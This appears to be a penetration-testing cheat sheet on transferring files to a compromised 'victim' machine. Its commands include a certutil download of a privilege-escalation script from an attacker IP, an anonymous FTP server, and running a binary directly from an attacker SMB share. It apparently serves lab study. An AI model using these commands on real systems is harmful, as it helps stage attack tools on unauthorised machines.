File Transfers

Windows

certutil.exe -urlcache -split -f "http://10.11.0.98/Powerless.bat" Powerless.bat

FTP

Server

pip install pyftpdlib
python -m pyftpdlib -p 21 -w
# On victim machine
ftp anonymous@10.11.0.98

Windows client

ftp -A %ATTACKER_IP%
# switch to binary mode
binary
get <file-name>

Linux Client

ftp $TARGET_IP

Python

*It seems not working for large binary file.

python -c "import urllib; print urllib.urlopen('http://10.11.0.98/<filename>').read()" > <filename>

SSH

ssh user@10.11.1.252 "cat > linuxprivchecker.py" < linuxprivchecker.py

SMB

Server

smbserver.py a /usr/share/windows-binaries/

Windows client

C:\> \\10.11.0.x\a\whoami.exe
PreviousPrivilege EscalationNextBuffer Overflow

Last updated

Was this helpful?